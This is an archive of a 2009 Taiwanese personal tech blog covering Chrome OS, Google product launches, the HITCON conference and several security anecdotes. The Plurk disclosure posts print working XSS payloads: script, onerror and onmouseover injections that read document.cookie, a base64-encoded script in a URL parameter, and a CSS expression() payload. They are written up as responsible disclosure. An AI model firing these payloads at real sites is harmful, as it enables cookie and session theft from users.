2009/11/21

Google Chrome OS!

今天抓了 Chromium OS 來玩。
http://www.chromium.org/chromium-os





因為他是基於 Ubuntu,所以 build 的時候使用 Ubuntu 來操作。
可以參考這邊 http://www.chromium.org/chromium-os/building-chromium-os/build-instructions

不過中間會遇到很多問題,例如要建立 /home/root/trunk 這個資料夾才能順利進去 chroot,還有很多很多其他需要調整的地方。
假如偷懶的話,可以直接去下載別人已經 build 好的 image。
VMDK 使用方法,在 VMware 裡面建立一個 Virtual Machine,然後選 Custom > Use an existion virtual disk 再指定過去就可以了。

GDGT (需要註冊)
http://gdgt.com/google/chrome-os/download/

一般在 build 的時候可以選擇 Offline 登入的帳號密碼,在這裡是 chronos / chronos。

BT 下載
http://torrents.thepiratebay.org/5170843/chromeos-image-999.999.32309.211410-a1.vmdk.bz2.5170843.TPB.torrent

在第一次透過 Google Account 登入之後,印象中這個帳號就可以 Offline 登入了。
基本上目前沒有什麼應用程式,通通都要透過 Web 來進行。
通通用 Google Web Application 也夠用了其實...
整個 GUI 其實也就只有一個 Chrome Browser 這樣,以及右上角加上一些系統資訊。

登入之後按下 Ctrl+Alt+T 可以叫出 Terminal Window。
要開什麼東西就都可以玩了。:P
用過 Ubuntu 的應該會很容易上手!

完整 Keyboard Shortcut:

 Action
 When
 Feature
 F12
 Running
 Toggle Window Overview
 F8
 Running
 Toggle keyboard overlay showing all the shortcut keys
 ESC
 Window Overview
 Exit Window Overview
 F2
 Boot
 Startup options - disable internal HDD to boot from USB stick
 Ctrl + Alt + T
 Running
 Open Terminal Window
 Ctrl + Alt + N          
 Chrome      
 Open New Chrome Window
 Ctrl + Alt + L
 Running
 Lock the screen
 Ctrl + Alt + M
 Running
 Enable external monitor
 Ctrl + ,
 Chrome
 Goto battery and network settings page (localhost:8080)
 Ctrl + Tab
 Chrome
 Next Tab
 Ctrl + Shift + Tab
 Chrome
 Prior Tab
 Ctrl + 1 through Ctrl + 8
 Chrome
 Switches to the tab at the specified position number on the tab strip
 Alt + Tab
 Running
 Next Window
 Alt + Shift + Tab
 Running
 Prior Window
 Close Lid
 Running
 Sleep mode
 Power-Key
 Running
 Shutdown

2009/11/17

Plurk XSS 安全性問題 (3)

不小心又看到的。Orz



http://www.plurk.com/unsubscribe?bemail=PHNjcmlwdD5hbGVydCgneHNzc3Nzc3Nzc3Nzc3Nzc3MnKTs8L3NjcmlwdD4=

bemail 只用 Base64 encode 而已,沒做其他處理。
而且系統只有阻擋 <input> 裡面的 value 把 <> 取代掉而已,<h2> 裡面的卻沒有處理。

唉,應該要做嚴謹一點的全域檢查啊....

這篇已經回報了。
一天後張貼。

2009/09/24

Google Sidewiki

Google 再出招!

Help and learn from others as you browse the web: Google Sidewiki
http://googleblog.blogspot.com/2009/09/help-and-learn-from-others-as-you.html

可以直接在這邊下載
http://www.google.com/sidewiki/

這真的是太邪惡的功能了...
每個人不用在自己的地方引用來評論一個網頁,而是可以直接用 Google Sidewiki 直接討論。
而且在觀看網頁的時候直接顯示...

唯一的缺點是一定要安裝 Toolbar 才能使用。
假如能夠更方便的使用一定能夠成為殺手級應用...

2009/09/23

Picasa 3.5 人臉辨識!

http://picasa.google.com/support/bin/answer.py?hl=en&answer=93773

中文版目前應該無法直接下載,可以用這個 Link
http://dl.google.com/picasa/picasa35-setup.exe

People albums

之前就一直很期待 Google 把 PicasaWeb 上的人臉辨識這個功能轉移到 Desktop 版,如同之前的預測,3.5 版也做進 Desktop 了。而且人臉資訊還是跟同步的,使用者也可以自己加上聯絡資訊電話mail等等。

滿滿的個人資料。:P

這樣對使用者來說分類照片跟找照片就真的是太方便了!
不用再一張一張找了...
推廣一下 :P

2009/07/24

HIT2009 台灣駭客年會 2009

http://hitcon.org/hit2009/

因為 TT 這次在美國沒辦法幫忙,所以今年變成我要擔攝影組組長這個大任。真的是相當大的責任啊...尤其是現在沒有單眼的我。XD

前一天麻煩天殺哥跟蚊子去幫我順路把相機拿過來,這次跟蘋果屋租了 Canon 5D MarkII + 580EX2,然後跟佛心老何借了 Canon 17-40L + 70-200mm F2.8L,還有跟 PD 借了我的老 Canon 350D + 17-70 給 Jekyll 幫忙拍。順便帶了腳架擔心 DV 沒帶腳架就糟糕了...

今天我覺得真的是相當精采!
有傳說中的 CIH,傳說中的 gasgas,超惡搞的 BBS Botnet,超強的 nanika 送行者,還有可愛的 Dark 破可愛人物的可愛線上遊戲...
每一場真的都是相當有意思跟相當有爆點。XD

這次 Wargame 我出了四題,因為比賽還在進行中所以不能講相關細節。
不過每個小陷阱都有人卯起來往裡面鑽真的是太強了..............XDDDD

真的是萬萬沒想到...
一點點小小的惡搞都可以搞翻一海票人....囧
結果惠翔解出來就馬上出來蓋我布袋了 XDDDDDDDDDD
跟我想的完全一樣 XD

Wargame 就是要惡搞好玩嘛!
不然每次都正經都密密麻麻一些看不懂的東西真的沒什麼意思...:p
儘管簡單一點又何妨?好玩就好啦!

2F Wargame 區結果就是滿滿的 ARP Spoofing ...
真的是太噁心了...XD
加上邪惡的綿羊牆,一整個是史上最黑暗最惡搞的駭客年會....XDDDDD

途中被 newbug call 到樓上 有人說我的 key submit 上去不對,但是其他人可以...
哪有這種鬼打牆的事情!!!!!!
結果跟 newbug 開始看 code 看 db...
最後苦主自己走過來說,他們看錯題了.....
ㄇ的咧 XDD 去外面罰站!!!

今天整天都拿租來的 Canon 5D MarkII + 580EX2 + 佛心老何的小白 + 17-40
整個是重到不行...
跑來跑去真的是整個沒力...
晚上聚餐的時候被按了一下肩膀整個痛到快流眼淚.....QQ

晚上跟可愛的 Dark 聊了一下,
真的是好小好小的小大一...
而且感覺跟小學妹皮卡丘長得很像.......
根本兩個人都是高中生的感覺 囧
結果才要大一就那麼強,真的是長江海嘯推前浪..........

講講點心,今年的點心會不會太多 囧
而且下午茶時間的時候感覺根本是人間煉獄 XDDD
人多到根本不知道該往哪邊看..........

還有今年的 T-shirt 跟杯子都好漂亮...
工作人員沒有杯子啦 >_<
T-shirt 我也只拿到 L 號 XDDD 可以當睡衣了...

Wargame 今是第一階段名次

1. Orange
2. 交大dsnslab
3. test (惠翔)

test 什麼 test 啊 XD


感謝 Birdman 鼎力相助生命加持的 DV,我有特別交代攝影組用生命去保護他...Q_Q

最後,5D2 真的是太讚了。
還是就買了好了...Q_Q
只是這樣花下去就要噴個十多萬了..............

腦袋空空了,今天先雜記到這邊。


第二天一早就 Taxi 殺過去,因為相機真的太重了 Orz
昨天肩膀痛到不行,今天只好先把攝影裝備放到休息室。
只拿小白的包包背著走動果然輕多了。

接著先上去找一下 newbug 看一下 Wargame 情況,順便賀一下 XD
某 cb 昏死一上午是怎樣 XD 過太爽! Q_Q

一早某人就說聽說有早餐可以吃,我說哪有人一來就找吃的。XDD
結果沒想到真的有早點可以吃.....超棒的!!
今年真的是太超過了...

一整天都不太舒服,大概真的太累了,所以先去台科大拉亞漢堡買了早餐吃。
等了超久的...orz 真的是相當兩光不專業...

今天整天的議程雖然不比第一天那麼過份的精彩,但是還是很棒的。
雖然有一兩場不太對胃口,但是大體上還是很棒的。

中間的餐點真的是太棒了...
但是真的是不舒服+太累+沒時間去吃...Orz

今天比較多時間龜在 Wargame 區看大家打,發現螢幕一堆 GIT / Dell / Guestbook,
其實滿有成就感的。XD
Wargame 就是要好玩啊...
bbb 卡關真的是鬼打牆啊!真的是很簡單的題目啊.....太可惜了!
不過解出其中幾個 key 果然也還是很想打我 XDDD

Alan 的食神美女圖真的是太經典了,Wargame MVP 非這題莫屬。XDDD
每年一定都要來點很激的題目才好玩啊......

聽 Goddamn 說今年女生好多,我怎麼都沒看到....好慘.......Orz

Ant 的議題真的很有意思。我看台下聽的也是很有興趣。:p
Nanika 今年真的是太棒了!!好多人問我 Nanika 是前幾年的那個 Nanika 嗎?
怎麼完全不一樣....XD 太讚了!!!
OuTian 的議題是壓軸,我想很多人都硬撐著在等這場...XD
喔對了還有,「你具有一個駭客的特質。」XDDDDDDDDDDDDDDDDDDDDD

Wargame 最後是 Orange 奪冠!真的是太強啦!!!
其實差一點就要被大可超越了...
應該要感謝 newbug 早了幾秒鐘關機器 XD
第二名是 Agos,老面孔了。你真的要謝謝我教你這幾招打遍天下。XDDDD
但是又是會被蓋布袋的........Orz
第三名 ccn,也是老面孔了。真的太強了!不過要設 ARP Static 啊!!

接著撤收又是累個半死 Orz

晚上的聚會真的還是好累 XD 照慣例到西門好樂迪唱歌!
跟 Kuon 看到計程車上 OuTian 都睡死了...XDD
而且大概真的太累了,不比去年那麼嗨。
除了跳舞跳得很開心的 Goddamn。XD
大家多半四散包廂,有東西出現的時候卯起來吃。XDD
cb 跟 GD 還外帶牛店是怎樣!!!太過份了啊啊啊啊啊 :~

然後大家都說小舞像服務生 XD 餐城玩太多了啦!

晚上到最後 22:40 走人!
HIT 完美結束!:D

今年真的太棒了...

2009/07/09

Goodbye, Milw0rm.

今天從 timhsu 長輩那邊知道 Milw0rm 要 Goodbye 了。




Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke


我想或許多多少少是一些地方的壓力造成的?少了這樣一個好地方真的滿可惜的,有的時候有一個即時更新新東西的集散地是相當有幫助的。相當感謝 str0ke 這些年來的維護...

不過這下主機們應該可以安靜一小段時間?XD
一些習慣去那邊抓 exploit 下來打的大概都要多花一些時間挖寶了...XD

抓個圖來紀念一下這時候的榮景...



---

Update 20090710:

http://www.milw0rm.com/

又復活了!XD
之前復站期間還因為一海票人一直掛著 mirror 又馬上被搞下去...

總之,可喜可賀!

---

Update 20091104:

http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

這次是站長過世了...:(

2009/07/08

Plurk 一些漏洞揭露 (2)

這兩天聽了 SySCAN,發現有志一同的發現了一樣的 css expression 問題。
真的滿有意思的!XDD

expression 的問題跟站長溝通過,filter 的過程真的是不太嚴謹。老早之前回報過的沒想到竟然只是過濾固定字串而已...Orz
儘管只是 IE only 的攻擊,但我想 < IE8 的使用者還是不在少數。這一點實在是不能忽略。

CSRF 目前建議了幾個方案給站長,Amir 說目前由於 API 的問題他們必須要做很大的修改。我想這多半是因為一開始設計的時候沒有考量到這些問題的緣故。這樣要改下去我想要花費不少的心力,真的是辛苦他們了!

目前建議 A-Team 要防堵 Worm 的攻擊,我想最簡單最初階的方法就是將散佈的手段防堵住,或者讓傳播的途徑更為複雜。將 Profile / 發訊息 / 回應訊息的地方限制住我想是個相當不錯的方法。:)

Plurk 在台灣使用者數量真的是越來越多,最近加好友跟粉絲的數量越來越多,暴增的使用者我想安全性對於使用者來說越來越來得重要。

希望 A-Team 多加油啊!

2009/06/28

Plurk 一些漏洞揭露

紀念今天拿到 Karma 100,來把 Plurk 已經修復的漏洞講一下。
跟站長幾個月前就溝通來往好久了,不記錄一下自己都快忘記了。
就目前手上有記錄的幾個貼上來記錄一下...



還沒修補的幾個就留著等 A-Team 修補完畢囉!

XSS
http://www.plurk.com/m/ 幾乎都有 XSS 問題http://www.plurk.com/Notifications/?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.plurk.com/Users/confirmEmail?user=%3Cscript%3Ealert(/x/)%3b%3C/script%3E&key=x&email=z

http://www.plurk.com/m/s/?query=a%22%3E%3Cimg%20src=%22aaa%22%20onerror=%22javascript:alert('a')%3b%22%3E%3C%22

與訊息有關皆有onmouseover:  http://allenown.blogspot.com/"onmouseover="alert('XD');" ( http://allenown.blogspot.com )

Custom CSS:  body{ background-url: ex/**/pression(alert(document.cookie)); }

還有一些 CSRF 因為還需要修正就先不記錄了。
等跟站長們討論過後再來更新這篇。:D

很感謝 Plurk 團隊 A-Team 一直願意修補這些問題,在 Plurk Birthday Party 上 Alvin 也說很感謝我們沒有先在網路上揭露這些問題,並且拿來進行攻擊。
希望 Plurk 能夠越來越完美。:)

Palm webOS Mojo SDK 終於出現了

Torrent
http://www.mininova.org/tor/2719050

Tutorial
http://www.clickonchris.com/2009/06/tutorial-palm-pre-sdk/

可以來好好玩一下了...XD

感覺應該滿好撰寫的..
不過更深入的功能就不知道了...

2009/06/26

寫作業,混過關。
期末考,混 Pass。
研究所,混畢業。
上班,混著等下班。

以為自己頂著什麼什麼的光環,有學歷?有地位?有人脈?就可以混過一切?
但是你的人生也就這樣給你混過去了啊。
有什麼意義嗎?

無法苟同。
道不同,不相為謀。

2009/06/19

最近真的是忙到不行...

最近真的是忙到一個不行啊。
因為要配合未來的超大計畫,所以勢必要做大修改...
之前開發團隊 (團隊嗎?XD) 一開始當然也不會想那麼多,到後面需要改的時候就真的是超級辛苦了...



畫著流程圖,用 MindMap 想著各種可能。
最近心煩意亂,就連思緒都跟著打結。

修行還不足...
需要站在更遠的地方來看待每一件事情...

加油!

2009/06/17

少林的 Starbucks 星冰樂

今天少林來公司找我一起喝星冰樂!
但是沒在那麼早就吃晚餐的啦,才五點耶...
而且公司還在忙一些東西 (絕對不是 Burn Rate!!)
所以就只有先讓少林去吃晚餐了。

八點我吃完晚餐去重慶南路的 Starbucks 找少林。
以前在這邊念書的時候感覺真的很愉快,好像很有靈感的磁場都在這邊。



少林好認真!好像被我打擾到了...XD
滿桌的 3C 產品...



喜歡喝的焦糖可可碎片沒了,只有喝了個巧克力可可。
少林很慷慨的只收我零錢。

聊了很多東西,其實跟有在同一個層次的人聊天真的是會很愉快的...
彼此的想法可以激發出很多更有趣的東西。
所以之前才會一直想要組一個好 Team 來玩一些東西...

聊到快十點就一邊走去搭車了。
希望少林的口試順利啊!

2009/05/21

Microsoft Windows Vista 萬惡的 UAC

我個人是還滿愛 UAC 的。
可以避免很多粗心的時候,也可以防止一些需要管理者權限的未知程式。



但是很多使用者可是一點都不愛啊,還教導其他使用者安裝 Vista 第一件事情是「把 UAC 關掉」。
「白痴才會繼續開著 UAC」「UAC感覺是給不懂電腦的人看的噱頭...」
糾正他們正確的觀念還會被酸到爆。XD
這真的是太無言了。

這證明了一事情:

產品絕對不能以工程師的角度來撰寫,User Friendly 是有絕對的必要性的。

如果嫌 Vista UAC 很煩很討厭的人,或許可以試試看這個工具:

The Norton User Access Control
http://www.nortonlabs.com/inthelab/uac.php

可以選擇記住每次 UAC 的選擇,也有比內建 UAC 更好的介面。
不過測試結果他會回傳資訊給 nortonlogs.symantec.com (216.10.197.156)。
在意者可以把它 block 掉。

另外還領教到一件事情:

還有,鄉民酸人的力量也是很大的。繼續用 IE6 吧笨蛋。

Firefox 套件 Link Reporter / 本日系統趣事

http://showcase.uworks.net/
https://addons.mozilla.org/zh-TW/firefox/addon/5340

這個套件可以即時顯示目前滑鼠游標上的 Link 是指向哪邊。
方便防範一些 Hyperlink 的欺騙,例如說在 Plurk 上的 http://ooo (http://xxx) 手法。
基本上會比看狀態列來得方便些。

但 是

今天在測試系統的時候發生一件事情。
在讀取資料的時候,再次重整頁面,資料竟然被刪除了!?
還想說:這麼巧使用者在線上喔,查一下使用者記錄。

結果使用者沒登入。XD 更可怕的是資料又被刪除了幾筆!!
這下大條了,調了一堆 log 出來看都沒問題,也不是 session 被偷走還是怎樣的...
不斷的測試讀取那個頁面之後終於那個頁面的資料被刪到剩下一筆了!XD

接著交叉測試 Goddamn 的帳號,他的竟然沒事?!
用他的電腦用我的帳號竟然也沒事...
結果換用 Google Chrome 也沒事...
最後目標還是鎖定在 Firefox 上。
(用 Goddamn 帳號的時候應該正好沒讀取到。)

東看看西看看,把 Firebug 關了,把 CoolPreviews 關了,把 AutoPager 也關了,
一些 SQL/XSS 測試套件通通關光。還是沒用。

最後想到,該不會是 Link Reporter................
用 Proxy 測一下,果然有送出 HEAD /deldata.php?id=123321 之類的。
應該是滑鼠移過去的時候 Request HEAD 讀取 HyperLink,然後就觸發了功能。

真相大白。
嚇出一身冷汗。

這給我幾個教訓:
1. 提姆員外說得對,Firefox 套件不要亂裝。XD
2. 直接 HEAD /xxx.php 就觸發這種設計真的是不太好,應該檢討一下。

Link Reporter 此套件安裝者請小心使用。XD

2009/05/16

時代在變,技術在變,人也要跟著更新。

這一兩年一直有這個想法:

以前玩技術都會一直循著以往的經驗跟模式去做。
一樣的 profile,一樣的 settings,一樣的工具,一樣的方法。
但是時代在變啊,有些時候一定會有一些更好的 solution 才對。

如果不跟著變,就只能等著被後浪卷走。
什麼都好玩,什麼都來玩,才是學技術最快的途徑啊...

當然,根據大神的開示,幹壞事也是進步最大的原動力,這也是真的不會錯的。:P

2009/05/15

「文明」人,該做的文明事。

有些時候真的覺得,人生還是不能一帆風順。
一切只靠後台、靠爸媽、靠財力、靠一些不是屬於自己雙手爭取到的東西,到最後思想也會隨之腐化。

自處高知識份子、高技術份子,卻只會懂得用盡一切手段達到目的、沒有信賴的人、沒有朋友、沒有支持,一切只有權力及財富。
這樣還有什麼意義呢?
這不就是「窮的只剩下錢?」

應該要知道怎麼養成高 EQ,怎麼去交朋友,怎麼去相信一個人。
跟著一群熱血的人,遠比跟幾個只想著要賺錢要耍心機的人快樂多了。

謹記,不要讓自己腐化。
要對得起自己。

2009/05/12

Plurk is under attack!

目前 Plurk 上被 http://www.plurk.com/sunwhite 攻擊中!





不知道他的身分及目的是什麼,目前也沒有看到附加的攻擊手法。
似乎是跑 Plurk message id 回應所有訊息...

才剛開回會回到公司,一上來就看到 Plurk 上這樣哀鴻遍野...
真的是滿誇張的。

目前 Plurk 被這樣攻擊導致速度相當緩慢。
或許可以作為一個大型網站的借鑑?

從去年六月份開始使用 Plurk 到現在,發現不少 Plurk 的問題。
在今年陸續回報些許問題,站方也不斷的在修正。
而有些關鍵性架構的問題目前還要等站方的修改。

有關 Plurk Worm 的實作日前在三月份已經通知站長。
CSRF 結合 XSS 攻擊可以對使用者造成很大的危害。

或許這次的攻擊可以讓站方思考一下遇到惡意使用者攻擊的時候該怎麼處置。

希望這次 sunwhite 發動的攻擊除了浪費 Plurk 的資源及頻寬之外,沒有造成其他危害。

Update: 目前此使用者已經被刪除。

2009/05/08

無名部分服務關閉

幹得好啊,無名小站。
來鞭來鞭!

http://www.wretch.cc/blog/WretchFAQ/9917582
在持續推出新服務的同時,無名小站也需要把資源做更有效的運用,讓工程師跟產品開發人員可以把重心放在更多大家喜愛的服務上。

讓我們來看看是什麼服務讓無名的資源沒辦法有效的運用,然後什麼服務大家不喜愛。

「網誌備份XML下載」

幹得好啊,無名小站。
要逃出無名的快點逃吧,沒辦法備份自己的文章了。

2009/05/02

環境是人創造的。

想要怎樣的環境,就用自己的雙手去創造。

說什麼因為環境不好才怎樣怎樣的,並不是你不成功的藉口。

執意於成功的人,自會披荊斬棘開拓出一條成功之路。

2009/04/30

socialthing 停止服務

今天登入 socialthing 看到上方的停止開發公告:

Discontinuing Support

Hey everyone, I come to you with both sad and exciting news. Unfortunately because we're so busy on new and cool things, we've had to stop supporting the current version (the one you're logged into). Soon, we'll be stopping new users from being added as well.

Rest assured, we'll keep this site up until there's a comparable offering.

You can read about the good news here.

Thanks for your continued support!


詳細說明可以看這篇:
http://blog.socialthing.com/2009/04/27/times-they-are-a-changing/

從 AOL 併購 Bebo 及 socialthing 之後,就一直在整合工作上進行。
看到 socialthing 之後可能的走向會是「Socialthing for Websites」,類似 Facebook 下方的 toolbar。今天正好在跟別的團隊談 Web2.0 的整合,想法跟這個有點類似。

Social Network 的要你命三千大整合還是很多人想做的,但是我想在這一戰裡面沒有一個人是絕對的贏家。畢竟加入商業的考量之後,會發現 Web2.0 的商機其實並沒有想像中那麼大--儘管他的點擊率相當相當的高,但是客群的掌握卻很難相當精準。假如要以廣告為主要收入的話,會有一定程度的困難。

這篇就可以得知一二。

原本我還滿喜歡 socialthing 的,要是併入 AOL 系統之後自由度不高,那就真的相當可惜了。希望他之後可以保持高自由度,而不是綁 AOL 的服務綁一大堆...Orz

2009/04/27

GeoCities 熄燈



國小的時候,第一個網頁就是在 GeoCities,網址還是什麼什麼村什麼門牌號碼,一長串的網址一定要存起來才會記得。相當相當懷念。
被 Yahoo! 收購走之後,經營一段時間,最後還是關閉服務了。

或許在 Blog 盛行的時代,Personal Homepage 已經不再重要了?

敬過去的網路。(舉杯)

2009/04/26

誓言

雖然或許是不重要、隨口跟我說說的一句話:

「以後,我們一定要大幹一票。」

我不知道你是不是認真的,也不知道我在你心中到底在什麼位置,
雖然或許有些人會覺得矯情,但是我也不知道為什麼我會看得那麼重。

『我會連你的份一起做到。』
『一定。』


2009/04/23

雙螢幕位置配置

前幾天 GD 來公司玩,看了這邊很多好物XD
其中有一個雙螢幕配置我覺得應該可以跟大家分享一下...
如果用雙螢幕的人同樣有這個困擾的話。

通常用 Windows 系統,右上角的「關閉」、「還原」、「縮小」三個按鈕會很常用。左下角的「開始功能表」也會很常用。左上角的功能表也是會常用到的。更不用說一些視窗四周都會有一些按鈕。

但是在雙螢幕配置的時候,通常「左右配置」左邊的螢幕要點到視窗右上角的按鈕,相當痛苦。一不小心就會跑到另一個螢幕...
右邊的螢幕要點到左上角的按鈕也是痛苦萬分...

在雙螢幕配置的時候,都可選擇視窗的位置。
我自己在使用的時候是配置成主螢幕在左上角,次螢幕在右下角。
拖曳的時候需要從左上拖曳到右下,習慣一下就好了。
這樣就完全不會有點擊不到左上右上角的問題了。

另外再配合 UltraMon ( http://www.realtimesoft.com/ultramon/ )
可以獨立每個螢幕的配置,包括桌布底色、甚至螢幕保護程式。
在視窗右上角也會新增「放大至所有螢幕」及「切換至另一螢幕」的功能鍵,超級好用!


小技巧分享~:D

2009/04/18

力不從心

事情好多,但是又想學新東西玩新東西。
再加上國外研究所的通知還有幾所還沒下文,整個心懸在那邊。
嘴巴上說不在意,但是心裡真的相當不踏實。

自己體力已經不如從前了,但是事情又倍增。
感覺都是簡單的小事情,但是通通自己親自來弄真的太花時間了...

真的要重新開始實行 GTD 系統將所有事情一樣一樣搞定,才能繼續學原本要學的新東西。
原本預計今年是精神時光屋修煉年的啊....Orz

整理電腦中的資料、把欠的文章通通弄出來、把照片整理上相簿、把要換得器材換齊、要賣的東西通通賣掉、把所有事情上軌道。
加油!

2009/04/17

Google Page Creator 遷移至 Google Sites

剛剛連到 Google Page,看到公告了。

根據這篇說明
http://www.google.com/support/sites/bin/answer.py?answer=144030&topic=14989

Google Page Creator will be shut down in June, 2009.

只要到 http://pages.google.com/migrationInfo/USERID 就會有選項說明。
看來之後 Google Page 應該是不會存在了,直接併入 Google Sites。

很可惜,Google Page 自定 HTML 還可以玩弄一些 JavaScript 之類的,也可以上傳檔案直接給外站讀取。但是 Google Sites 就沒那麼好命了,限制一大堆,而且可用程度我覺得還不及目前成熟的 wiki platform 的一半...

不過關掉 Google Page 也不算壞事,因為很多攻擊者都直接拿來放惡意 JavaScript 檔案了。不過也有很多 Blogger 把自己定義的 JS 檔放在上面,這下要換地方了...或許 Google Code 是個好地方?XD

總之,大家搬家啦!

2009/04/12

Just Hear It 音樂搜尋引擎

http://www.justhearit.com/

Goston's Blog 看到的。全 Flash,而且速度很快。線上直接播放基本上很流暢...
常常突然要找什麼歌的時候,真的是太方便了!

可是 permalink 好像目前有問題,中文搜尋目前也不支援。算是很可惜的一點。
不過目前還在 Private Beta,未來相當有可看性!

( 不想看背景的話可以從這邊進入 :P)

2009/04/08

Google App Engine for Java

Google App Engine 終於支援 Java 了!
http://googleappengine.blogspot.com/2009/04/seriously-this-time-new-language-on-app.html

申請頁面
http://appengine.google.com/promo/java_runtime

討論群組:
http://groups.google.com/group/google-appengine-java

Google Plugin for Eclipse
http://code.google.com/eclipse

這次 GAE 支援 Java 我想一定會有一海票 Java Application 搬上去...
畢竟 Java 還是比 Python 寬廣多了。

不知道 Google App Engine 什麼時候才能全力與 Amazon Web Services 一拼啊...
真的很難想像以後幾年網路會變成什麼樣子,全部雲端化?XD

現在要玩的東西真的太多了,現在又多了一個自己相當熟悉的老 Java on GAE 可以玩...

2009/04/06

令人害怕的年#售票系統...

今天幫念德跟殺皮一起買 X Japan 演唱會的票。
聽說這次有機會收錄在 DVD?

這次真的要來了,讓我想到半年前報紙上的全版廣告....XD


不過年#售票系統真的是很讓人無言...

首先看看 FAQ:
http://www.t#cket.com.tw/infor/ticketing_qa.asp

如申請時出現”無法在物件 '會員資料' 上插入重複索引鍵” ,可能是您曾經加入過會員因此無法用相同身份證再重複申請。

「無法在物件 '會員資料' 上插入重複索引鍵」這種系統的訊息竟然有機會直接噴出來給使用者?看到真的差點吐血...

更不用說還會有這種畫面了:

處理 URL 時伺服器發生錯誤。請連絡您的系統管理員。

還有 Title 是「Untitled Document」的頁面...

接下來,訂票的時候是借用 Goddamn 兄的帳號,結果打電話去查詢密碼的時候,只告知了姓名及身分證字號...

客服直接告訴他原本的密碼。原來資料庫存密碼是明碼啊...

姓名跟身分證字號這種那麼容易取得的資料,只要打電話給年#,就可以直接取得密碼了喔!

據我所知使用此系統的人真的是滿多的,但是系統層面的安全性真的令人擔憂...
大家在使用的時候還是小心保密自己的資料啊...

2009/04/05

Palm webOS Mojo SDK

最近才在該該叫 Palm Mojo Framework 到底什麼時候才會釋出...
結果昨天就看到可以申請了...

http://sdkapplication.palm.com/sdkapplication/

不過不知道好不好申請就是了。
Palm Pre 趕快出啊!!!

2009/03/30

有關變強這件事情

玩電腦其實快二十年了...
越到後來才越積極的想變強...

半弔子以前半吊子的自己亂玩,很多東西自己很早就接觸過了。
不知道去哪學的 dos,不知道去哪學的 SoftICE,不知道去哪學的一堆東西...

以後再碰到的時候很快就可以上手,但是卻覺得已經會了,就沒有繼續往更深入進去了。
於是就一直停留在表面。在真正需要用到的時候,卻因為實力不夠,感到無力...

在一些前輩、老師的指點之下,知道了一件事情:

「時機對,但是你實力不夠,這個時機就錯過了。
而且搞不好時機再也回不來了。」


不管是正面的指引,還是負面的指責,從高中到大學很多事情影響我相當深厚。

「我們用比較的方法去量度每一件事情,包括自己在內。
如果沒有一個擁有極不尋常能力的人來相比,就會有危險,
我們很容易把自己看成極有才能的人…
如果所處得環境太窄,中庸人才可能自認為很了不起
(在這窄環境的其他人也可能認為他真是了不起)。
同理,偉大的人在巨人面前就會覺得自己很矮小。這是一種最有益的感覺…
— Hans Krebs」


這段話說的就是一直以來切身體會的東西。

所以要在自己還有力氣的時候,
有機會,就讓自己變強。
沒有機會,就自己製造變強的機會。

不想再輸了。真的。

2009/03/18

Furl 併入 Diigo

收到 Furl 的通知信,要被併入 Diigo 了。
http://www.furl.net/root/diigo_info

以前因為 Furl 點一下就存檔備份的功能真的很好用,所以在這邊也放了不少網頁備份。
一度覺得他撐不下去,還好現在還是有人要他的...XD

目前轉移到 Diigo 可以自動匯入。
假如是要匯出的話官方提供的匯出方案相當齊全。
http://www.furl.net/tools/export

現在我備份都用 Evernote 了。
看來大一統的時候到了..

2009/03/15

Microsoft Hotmail / Live mail 開放 POP3

As of March 12, 2009, POP3 access is now available to Hotmail users WORLDWIDE.
http://windowslivewire.spaces.live.com/blog/cns!2F7EB29B42641D59!32413.entry

設定如下:
POP server: pop3.live.com (Port 995)
POP SSL required? Yes
User name: Your Windows Live ID, for example yourname@hotmail.com
Password: The password you usually use to sign in to Hotmail or Windows Live
SMTP server: smtp.live.com (Port 25)
Authentication required? Yes (this matches your POP username and password)
TLS/SSL required? Yes


這樣終於可以在一般的軟體裡面收發 hotmail 信箱了。
雖然 Hotmail 真的是很難用,微軟自己的垃圾廣告信又一堆,重要的信又跑到 SPAM,但是好歹他也是個很老的信箱了。
留作紀念一下。XD

2009/03/07

小時候的床

家裡的配置很奇怪。

小時候沒有自己的房間,直到姊姊出國念書之後才開始住姊姊以前的房間。
自己之前跟爸媽睡在同一個房間,旁邊擺一個小木床。
基本上床不大,大概要腳彎著才能好好睡。

在很小的時候,常常會因為床單、被單、被子上面奇怪的卡通圖案感到害怕。
不知道為什麼那個年代很多圖案,並不是一個可愛的圖案,而是一些怪怪的動物,怪怪的圖,印象中還有美國隊長。
在小時候根本覺得怪透了。

於是乎小時候就會常常做惡夢,夢到那些怪動物在講話,在動。
真的好慘啊。
不知道到了多久之後才慢慢不會這樣。
也不知道對我的性格有沒有影響?!XD

附帶一提,床的位置也很微妙。

  門  鏡

鏡    床  大衣櫃
鏡    床  大衣櫃

坐起身就會看到一面落地的大鏡子,頭轉向左邊是個梳妝台的大鏡子。
床右側是靠著個大衣櫃。

某天上課老師講到了風水:
書床不不能對著鏡子,旁邊也不能有櫃子、架子等有壓迫性的東西。
我的心情就相當複雜...XD

2009/03/04

Apt 2.0 for PalmOS Free Release 免費版釋出

http://apt-palm.wikidot.com/
# first free release: this application is to be used at your own risk, none of the people, author, maintainer, copyright holder and/or contributor may be held responsible for any damage resulting of the use or misuse of this application.

PalmOS 上超級強悍的工具免費版釋出!

可以自定所有程式的環境設定值,包括音量、背光、紅外線、全螢幕等等,更強悍的是自定按鈕呼叫功能,自定功能表等。只要設定得當操作 PalmOS 的速度一定是原本的數倍。

在常用的程式,例如說記帳軟體,指定某一種手勢就呼叫計算機 DA,另一種手勢就呼叫記事本。只要定好每個軟體可能會用到的相關呼叫,就可以流暢的使用每一個軟體,要快速切換到什麼程式都可以。

程式100k左右,相當小。
以後不知道在其他 PDA 系統上有沒有辦法出現類似的強悍工具...

Google Friend Connect + Blogger

這幾天 Blogger 終於跟 Friend Connect 開始整合了。
但是目前還沒完全整合,在 Friend Connect 頁面看不到 Blogger 的設定,就算自己新增也是另一個新的 Site id,無法管理。

目前有個取巧的方法,就是在 Blogger 裡面新增 Follower Gadget,然後看原始碼抄下 site id。
例如以下的 site: '10177152201056979641'
google.friendconnect.container.setParentUrl('/' /* location of rpc_relay.html and canvas.html */);
google.friendconnect.container.renderMembersGadget(
{ id: 'div-1235736742216',
